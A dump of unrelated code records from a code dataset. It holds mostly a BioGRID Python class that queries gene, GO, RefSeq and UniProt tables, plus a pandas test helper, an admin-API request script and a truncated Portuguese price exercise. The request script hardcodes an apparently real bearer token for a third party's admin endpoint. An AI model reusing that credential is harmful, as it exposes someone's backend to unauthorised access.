}\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn organismHash\t\r\n\r\n\tdef fetchRefseqOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_refseq_organisms\" )\r\n\t\t\r\n\t\torganismHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn organismHash\t\r\n\t\r\n\tdef fetchGODefinitionHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT go_id, go_name, go_type FROM \" + Config.DB_NAME + \".go_definitions\" )\r\n\t\t\r\n\t\tgoHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgoHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn goHash\r\n\t\t\r\n\tdef fetchGOEvidenceHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT go_evidence_code_id, go_evidence_code_symbol FROM \" + Config.DB_NAME + \".go_evidence_codes\" )\r\n\t\t\r\n\t\tgoHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgoHash[str(row[0])] = row[1]\r\n\t\t\t\r\n\t\treturn goHash\r\n\t\t\r\n\tdef formatGOSet( self, goSet, goCombined ) :\r\n\t\r\n\t\tif len(goSet[\"IDS\"]) > 0 :\r\n\t\t\tgoCombined[\"IDS\"] = 
goCombined[\"IDS\"] + goSet[\"IDS\"]\r\n\t\t\tgoCombined[\"NAMES\"] = goCombined[\"NAMES\"] + goSet[\"NAMES\"]\r\n\t\t\tgoCombined[\"EVIDENCE\"] = goCombined[\"EVIDENCE\"] + goSet[\"EVIDENCE\"]\r\n\t\t\t\r\n\t\t\tgoSet[\"IDS\"] = \"|\".join( goSet[\"IDS\"] )\r\n\t\t\tgoSet[\"NAMES\"] = \"|\".join( goSet[\"NAMES\"] )\r\n\t\t\tgoSet[\"EVIDENCE\"] = \"|\".join( goSet[\"EVIDENCE\"] )\r\n\t\t\t\r\n\t\telse :\r\n\t\t\t\r\n\t\t\tgoSet[\"IDS\"] = \"-\"\r\n\t\t\tgoSet[\"NAMES\"] = \"-\"\r\n\t\t\tgoSet[\"EVIDENCE\"] = \"-\"\r\n\t\t\t\r\n\t\treturn goSet, goCombined\r\n\t\t\r\n\tdef fetchGO( self, itemID, itemType ) :\r\n\t\r\n\t\tgoProcess = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\tgoComponent = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\tgoFunction = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\t\r\n\t\tif len(itemID) > 0 :\r\n\t\t\t\r\n\t\t\tif \"GENE\" == itemType.upper( ) :\r\n\t\t\t\tself.cursor.execute( \"SELECT go_id, go_evidence_code_id FROM \" + Config.DB_NAME + \".gene_go WHERE gene_id=%s AND gene_go_status='active'\", [itemID] )\r\n\t\t\telif \"UNIPROT\" == itemType.upper( ) :\r\n\t\t\t\tself.cursor.execute( \"SELECT go_id, go_evidence_code_id FROM \" + Config.DB_NAME + \".uniprot_go WHERE uniprot_id=%s AND uniprot_go_status='active'\", [itemID] )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t(goID, goName, goType) = self.goDefs[str(row[0])]\r\n\t\t\t\tgoEvidence = self.goEvidence[str(row[1])]\r\n\t\t\t\t\r\n\t\t\t\tgoCompare = goName.upper( )\r\n\t\t\t\tif \"BIOLOGICAL_PROCESS\" != goCompare and \"CELLULAR_COMPONENT\" != goCompare and \"MOLECULAR_FUNCTION\" != goCompare :\r\n\t\t\t\t\t\r\n\t\t\t\t\tgoCompare = goType.upper( )\r\n\t\t\t\t\tif \"BIOLOGICAL_PROCESS\" == goCompare :\r\n\t\t\t\t\t\tgoProcess[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoProcess[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoProcess[\"NAMES\"].append( goName )\r\n\t\t\t\t\t\r\n\t\t\t\t\telif \"CELLULAR_COMPONENT\" == goCompare :\r\n\t\t\t\t\t\tgoComponent[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoComponent[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoComponent[\"NAMES\"].append( goName )\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telif \"MOLECULAR_FUNCTION\" == goCompare :\r\n\t\t\t\t\t\tgoFunction[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoFunction[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoFunction[\"NAMES\"].append( goName )\t\r\n\t\t\r\n\t\treturn goProcess, goComponent, goFunction\r\n\t\t\r\n\tdef fetchExternalsForRefseq( self, refseqIDs ) :\r\n\t\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT refseq_accession, refseq_gi, refseq_version FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id IN (%s) and refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternalIDSet.extend( [str(row[0]), str(row[1])] )\r\n\t\t\t\texternalTypeSet.extend( [\"REFSEQ-PROTEIN-ACCESSION\", \"REFSEQ-PROTEIN-GI\"] )\r\n\t\t\t\t\r\n\t\t\t\tfor version in range( 0, row[2] ) :\r\n\t\t\t\t\texternalIDSet.append( str(row[0]) + \".\" + str(version+1) )\r\n\t\t\t\t\texternalTypeSet.append( \"REFSEQ-PROTEIN-ACCESSION-VERSIONED\" )\r\n\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT refseq_identifier_value, refseq_identifier_type FROM \" + Config.DB_NAME + \".refseq_identifiers WHERE refseq_id IN (%s) and refseq_identifier_status='active'\" % sqlFormat, 
tuple(refseqIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternalIDSet.append( str(row[0]) )\r\n\t\t\t\t\r\n\t\t\t\trefseqType = \"REFSEQ\"\r\n\t\t\t\tif \"rna-accession\" == row[1].lower( ) :\r\n\t\t\t\t\trefseqType = \"REFSEQ-RNA-ACCESSION\"\t\r\n\t\t\t\telif \"rna-gi\" == row[1].lower( ) :\r\n\t\t\t\t\trefseqType = \"REFSEQ-RNA-GI\"\r\n\t\t\t\t\t\r\n\t\t\t\texternalTypeSet.append( refseqType )\r\n\t\t\t\t\r\n\t\treturn externalIDSet, externalTypeSet\r\n\t\t\r\n\tdef fetchExternals( self, geneID, refseqIDs ) :\r\n\t\r\n\t\texternals = set( )\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT gene_external_value, gene_external_source FROM \" + Config.DB_NAME + \".gene_externals WHERE gene_external_status='active' AND gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternals.add( str(row[0]).upper( ) + \"|\" + str(row[1]).upper( ) )\r\n\t\t\t\t\r\n\t\t\trefseqExternals, refseqExternalTypes = self.fetchExternalsForRefseq( refseqIDs )\r\n\t\t\t\r\n\t\t\tif len(refseqExternals) > 0 :\r\n\t\t\t\tfor refseqExternal, refseqExternalType in zip( refseqExternals, refseqExternalTypes ) :\r\n\t\t\t\t\texternals.add( str(refseqExternal).upper( ) + \"|\" + str(refseqExternalType).upper( ) )\r\n\t\r\n\t\tfor external in externals :\r\n\t\t\textSplit = external.split( \"|\" )\r\n\t\t\texternalIDSet.append( extSplit[0] )\r\n\t\t\texternalTypeSet.append( extSplit[1] )\r\n\t\r\n\t\treturn externalIDSet, externalTypeSet\r\n\t\t\r\n\tdef fetchAliases( self, geneID, officialSymbol ) :\r\n\t\r\n\t\taliases = []\r\n\t\tuniqueAliases = set( )\r\n\t\tsystematicName = \"-\"\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT gene_alias_value, gene_alias_type FROM \" + Config.DB_NAME + \".gene_aliases WHERE gene_alias_status='active' and gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif \"ordered locus\" == row[1] :\r\n\t\t\t\t\tsystematicName = str(row[0])\r\n\t\t\t\telse :\r\n\t\t\t\t\tif str(row[0].upper( )) != str(officialSymbol.upper( )) and str(row[0].upper( )) not in uniqueAliases :\r\n\t\t\t\t\t\taliases.append( str(row[0]) )\r\n\t\t\t\t\t\tuniqueAliases.add( str(row[0].upper( )) )\r\n\t\t\t\t\t\t\r\n\t\treturn systematicName, aliases\r\n\t\t\r\n\tdef fetchRefseqIDs( self, geneID ) :\r\n\t\t\r\n\t\trefseqIDs = set( )\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE gene_id=%s and gene_refseq_status='active'\", [geneID] )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\trefseqIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn refseqIDs\r\n\t\t\r\n\tdef fetchUniprotIDs( self, refseqIDs ) :\r\n\t\r\n\t\tuniprotIDs = set( )\r\n\t\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_id FROM \" + Config.DB_NAME + \".protein_mapping WHERE refseq_id IN (%s) and protein_mapping_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tuniprotIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn uniprotIDs\r\n\t\t\r\n\tdef fetchUniprotNamesForGenes( self, uniprotIDs ) :\r\n\r\n\t\tuniprotAliases = set( )\r\n\t\tuniprotAliasesUnique = set( )\r\n\t\tuniprotExternals = set( )\r\n\t\tuniprotExternalsUnique = set( )\r\n\t\tuniprotExt = []\r\n\t\tuniprotExtTypes = 
[]\r\n\t\t\r\n\t\tif len(uniprotIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(uniprotIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_identifier_value, uniprot_name, uniprot_source FROM \" + Config.DB_NAME + \".uniprot WHERE uniprot_id IN (%s) AND uniprot_status='active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\r\n\t\t\t\tif str(row[1]).upper( ) not in uniprotAliasesUnique :\r\n\t\t\t\t\tuniprotAliases.add( row[1] )\r\n\t\t\t\t\tuniprotAliasesUnique.add( row[1].upper( ) )\r\n\t\t\t\t\r\n\t\t\t\tif str(row[0]).upper( ) + \"|\" + str(row[2]).upper( ) not in uniprotExternalsUnique :\r\n\t\t\t\t\tuniprotExternals.add( str(row[0]) + \"|\" + str(row[2]).upper( ) )\r\n\t\t\t\t\tuniprotExternalsUnique.add( str(row[0]).upper( ) + \"|\" + str(row[2]).upper( ) )\r\n\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_alias_value, uniprot_alias_type FROM \" + Config.DB_NAME + \".uniprot_aliases WHERE uniprot_id IN (%s) AND uniprot_alias_type != 'primary-accession' AND uniprot_alias_status='active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif 'ACCESSION' == row[1].upper( ) :\r\n\t\t\t\t\tif str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" not in uniprotExternalsUnique :\r\n\t\t\t\t\t\tuniprotExternals.add( str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" )\r\n\t\t\t\t\t\tuniprotExternalsUnique.add( str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" )\r\n\t\t\t\telse :\r\n\t\t\t\t\tif str(row[0]).upper( ) not in uniprotAliasesUnique :\r\n\t\t\t\t\t\tuniprotAliases.add( row[0] )\r\n\t\t\t\t\t\tuniprotAliasesUnique.add( row[0].upper( ) )\r\n\t\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_isoform_accession, uniprot_isoform_number FROM \" + Config.DB_NAME + \".uniprot_isoforms WHERE uniprot_id IN (%s) AND uniprot_isoform_status = 'active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\t\t\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t\r\n\t\t\t\tisoform = row[0].upper( ) + \"-\" + str(row[1]) + \"|UNIPROT-ISOFORM\"\r\n\t\t\t\t\r\n\t\t\t\tif isoform not in uniprotExternalsUnique :\r\n\t\t\t\t\tuniprotExternals.add( isoform )\r\n\t\t\t\t\tuniprotAliasesUnique.add( isoform )\r\n\t\t\t\t\t\r\n\t\t\tfor uniprotExtInfo in uniprotExternals :\r\n\t\t\t\textSplit = uniprotExtInfo.split( \"|\" )\r\n\t\t\t\tuniprotExt.append(extSplit[0])\r\n\t\t\t\tuniprotExtTypes.append(extSplit[1])\r\n\t\t\t\t\t\r\n\t\treturn list(uniprotAliases), uniprotExt, uniprotExtTypes\r\n\t\t\r\n\tdef fetchDescription( self, geneID, refseqIDs ) :\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\r\n\t\t\tdescriptions = { }\r\n\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT gene_definition_text, gene_definition_source FROM \" + Config.DB_NAME + \".gene_definitions WHERE gene_definition_status='active' AND gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif row[1] not in descriptions :\r\n\t\t\t\t\tdescriptions[row[1]] = set( )\r\n\t\t\t\tdescriptions[row[1]].add( row[0] )\r\n\t\t\t\t\r\n\t\t\tif 'CGD-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['CGD-DESCRIPTION'])\r\n\t\t\t\r\n\t\t\tif 'SGD-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['SGD-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'POMBASE-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['POMBASE-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'WORMBASE-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; 
\".join(descriptions['WORMBASE-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'WORMBASE-CLASS' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['WORMBASE-CLASS'])\r\n\t\t\t\t\r\n\t\t\tif len(refseqIDs) > 0 :\r\n\t\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\t\tself.cursor.execute( \"SELECT refseq_description FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id IN (%s) and refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\r\n\t\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t\tif 'PROTEIN-DESCRIPTION' not in descriptions :\r\n\t\t\t\t\t\tdescriptions['PROTEIN-DESCRIPTION'] = set( )\r\n\t\t\t\t\tdescriptions['PROTEIN-DESCRIPTION'].add( row[0] )\r\n\t\t\t\t\r\n\t\t\tdescription = \"-\"\r\n\t\t\tif 'ENTREZ-DESCRIPTION' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-DESCRIPTION'])\r\n\t\t\t\t\t\t\r\n\t\t\telif 'PROTEIN-DESCRIPTION' in descriptions :\r\n\t\t\t\t\r\n\t\t\t\tlongestDesc = \"-\"\r\n\t\t\t\tfor description in descriptions['PROTEIN-DESCRIPTION'] :\r\n\t\t\t\t\tif len(longestDesc) <= len(description) :\r\n\t\t\t\t\t\tlongestDesc = description\r\n\t\t\t\t\t\t\r\n\t\t\t\tdescription = longestDesc\r\n\t\t\t\t\r\n\t\t\telif 'ENTREZ-OTHERDESIGNATION' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-OTHERDESIGNATION'])\r\n\t\t\t\t\t\t\r\n\t\t\telif 'ENTREZ-NOMENNAME' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-NOMENNAME'])\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\treturn description\r\n\t\t\r\n\tdef fetchProtein( self, proteinRefID, proteinType ) :\r\n\t\r\n\t\tproteinDetails = []\r\n\t\tif len(proteinRefID) > 0 :\r\n\t\t\t\r\n\t\t\tif \"UNIPROT\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchUniprotProtein( proteinRefID )\r\n\t\t\telif \"REFSEQ\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchRefseqProtein( proteinRefID )\r\n\t\t\telif \"UNIPROT-ISOFORM\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchUniprotIsoformProtein( proteinRefID )\r\n\t\t\telse :\r\n\t\t\t\tproteinDetails = False\r\n\t\t\t\r\n\t\treturn proteinDetails\r\n\t\t\t\r\n\tdef fetchUniprotProtein( self, uniprotID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".uniprot WHERE uniprot_id=%s and uniprot_status='active' LIMIT 1\", [uniprotID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchRefseqProtein( self, refseqID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id=%s and refseq_status='active' LIMIT 1\", [refseqID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchUniprotIsoformProtein( self, uniprotIsoformID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".uniprot_isoforms WHERE uniprot_isoform_id=%s and uniprot_isoform_status='active' LIMIT 1\", [uniprotIsoformID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchUniprotExternals( self, uniprotID, refseqIDs ) :\r\n\t\r\n\t\texternals = set( )\r\n\t\tentrezGeneIDs = set( )\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_external_value, uniprot_external_source FROM \" + Config.DB_NAME + \".uniprot_externals WHERE uniprot_id=%s AND uniprot_external_status='active'\", [uniprotID] )\r\n\t\t\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\r\n\t\t\tvalue = str(row[0]).upper( ).replace( \"HGNC:\", \"\" ).replace( \"MGI:\", \"\" ).replace( \"RGD:\", \"\" 
)\r\n\t\t\r\n\t\t\texternals.add( str(value) + \"|\" + str(row[1]) )\r\n\t\t\t\r\n\t\t\tif \"ENTREZ_GENE\" == row[1].upper( ) :\r\n\t\t\t\tentrezGeneIDs.add( str(row[0]) )\r\n\t\t\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\trefseqExternals, refseqExternalTypes = self.fetchExternalsForRefseq( refseqIDs )\r\n\t\t\t\t\r\n\t\t\tfor refseqExternal, refseqExternalType in zip(refseqExternals,refseqExternalTypes) :\r\n\t\t\t\texternals.add( str(refseqExternal) + \"|\" + str(refseqExternalType) )\r\n\t\t\t\t\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\t\r\n\t\tfor external in externals :\r\n\t\t\tsplitExternal = external.split( \"|\" )\r\n\t\t\texternalIDSet.append( splitExternal[0] )\r\n\t\t\texternalTypeSet.append( splitExternal[1] )\r\n\t\t\t\t\r\n\t\treturn externalIDSet, externalTypeSet, entrezGeneIDs\r\n\t\t\r\n\tdef fetchRefseqIDsByUniprotID( self, uniprotID ) :\r\n\t\r\n\t\trefseqIDs = set( )\r\n\t\tif len(uniprotID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_NAME + \".protein_mapping WHERE uniprot_id=%s AND protein_mapping_status='active'\", [uniprotID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\trefseqIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn refseqIDs\r\n\t\t\r\n\tdef fetchGeneIDsByEntrezGeneIDs( self, entrezGeneIDs ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(entrezGeneIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(entrezGeneIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".genes WHERE gene_source_id IN (%s) AND gene_source='ENTREZ' AND gene_status='active'\" % sqlFormat, tuple(entrezGeneIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tgeneIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn geneIDs\r\n\t\t\r\n\tdef fetchGeneIDByRefseqIDs( self, refseqIDs ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE refseq_id IN (%s) AND gene_refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tgeneIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn geneIDs\r\n\t\t\r\n\tdef fetchGeneIDByRefseqID( self, refseqID ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(refseqID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE refseq_id = %s AND gene_refseq_status='active' LIMIT 1\", [refseqID] )\r\n\t\t\trow = self.cursor.fetchone( )\r\n\t\t\t\r\n\t\t\tif None == row :\r\n\t\t\t\treturn \"0\"\r\n\t\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef hasFeatures( self, uniprotID ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_feature_id FROM \" + Config.DB_NAME + \".uniprot_features WHERE uniprot_id=%s AND uniprot_feature_status='active' LIMIT 1\", [uniprotID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\tdef fetchUniprotAliases( self, uniprotID, geneIDs, primaryIdentifier ) :\r\n\t\r\n\t\taliases = []\r\n\t\t\r\n\t\tif len(uniprotID) > 0 :\r\n\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_alias_value FROM \" + Config.DB_NAME + \".uniprot_aliases WHERE uniprot_id=%s AND uniprot_alias_status='active'\", [uniprotID] )\r\n\t\t\t\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif row[0].upper( ) != primaryIdentifier.upper( ) :\r\n\t\t\t\t\taliases.append( str(row[0]) 
)\r\n\t\t\t\t\t\r\n\t\tif len(geneIDs) > 0 :\r\n\t\t\tfor geneID in geneIDs :\r\n\t\t\t\tsystematicName, geneAliases = self.fetchAliases( geneID, primaryIdentifier )\r\n\t\t\t\t\r\n\t\t\t\tif \"-\" != systematicName :\r\n\t\t\t\t\taliases.append( systematicName )\r\n\t\t\t\t\r\n\t\t\t\tif len(geneAliases) > 0 :\r\n\t\t\t\t\taliases.extend( geneAliases )\r\n\t\t\t\t\t\t\r\n\t\treturn set( aliases )\r\n\t\t\r\n\tdef fetchOfficialSymbol( self, geneID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT gene_name FROM \" + Config.DB_NAME + \".genes WHERE gene_id=%s LIMIT 1\", [geneID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn \"-\"\r\n\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef fetchCurationStatus( self, geneID, refseqID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT refseq_status FROM \" + Config.DB_NAME + \".gene_refseqs WHERE gene_id=%s AND refseq_id=%s LIMIT 1\", [geneID, refseqID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn \"-\"\r\n\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef fetchValidGeneIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_QUICK + \".quick_annotation\" )\r\n\t\t\r\n\t\tgeneHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgeneHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn geneHash\r\n\t\t\r\n\tdef fetchValidUniprotIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_id FROM \" + Config.DB_QUICK + \".quick_uniprot\" )\r\n\t\t\r\n\t\tproteinHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tproteinHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn proteinHash\r\n\t\t\r\n\tdef fetchValidRefseqIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_QUICK + \".quick_refseq\" )\r\n\t\t\r\n\t\tproteinHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tproteinHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn proteinHash\r\n\t\t\r\n\tdef fetchQuickAnnotation( self, geneID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_annotation WHERE gene_id=%s\", [geneID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn row","repo_name":"BioGRID/BioGRID-Annotation","sub_path":"classes/Quick.py","file_name":"Quick.py","file_ext":"py","file_size_in_byte":19028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"639634063","text":"import pandas as pd\nimport numpy as np\nfrom tdx import Formula\n\ndef verify_result(result, expected, float_cmp, debug):\n if not isinstance(result, pd.core.series.Series):\n if result == expected:\n print('TEST OK')\n return\n else:\n print('TEST Failed.')\n return\n result = result.dropna()\n expected = expected.dropna()\n if debug:\n print('RESULT:')\n print(result)\n print('EXPECTED:')\n print(expected)\n if float_cmp:\n cmp = (np.abs(result - expected) < 2.631048e-06)\n else:\n cmp = (result == expected)\n if len(cmp[cmp == False]) > 0 :\n print('TEST Failed.')\n return\n print('TEST OK.')\n return\n\n\ndef testfunc(text, param, float_comp = False, debug = False):\n formula = Formula(text, \"\")\n if isinstance(param, dict):\n params = [param]\n elif isinstance(param, list):\n params = param\n else:\n raise ValueError(\"param should be dict or list.\")\n\n for pa in params:\n #print(formula.annotate(pa))\n result = formula.evaluate(pa)\n if result is None:\n print('TEST Failed in evaluate 
strategy.')\n            return\n        verify_result(result, pa['RESULT'], float_comp, debug)\n\n\ndef testcase(func):\n    def test_case_impl():\n        print('Perform %s...' % func.__name__)\n        ret = func()\n        testfunc(*ret)\n    return test_case_impl\n","repo_name":"woodylee1974/tdx_formula","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} {"seq_id":"18710454021","text":"import requests\nimport json\n\ntoken = '1'\n\nsrc = 'http://backend.lianalaser.com/Admin/'\n\nr = requests.get(src + 'operator/program/list/1402/2/2', headers={'Authorization': 'barear 4804fa170acc47078f14afc1cf7d4384'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/Admin/OperatorProgramList.py","file_name":"OperatorProgramList.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"34076850540","text":"# Josefson wants to go shopping in China. She wants to buy a cell phone for USD 299.99, a kettle for\r\n# USD 23.87, a garden gnome for USD 66.66 and 6 unicorn stickers at USD 1.42 each. Shipping\r\n# all of this to the city of Rolândia, in Paraná, came to USD 12.34.\r\n\r\ncelular = 299.99\r\nchaleira = 23.87\r\ngnomo = 66.66\r\nadesivos = 6 * 1.42\r\n\r\ntotalDolar = celular + chaleira + gnomo + adesivos\r\niof = 0.0638\r\ntotalReal = (totalDolar * 5.40)  # converting USD 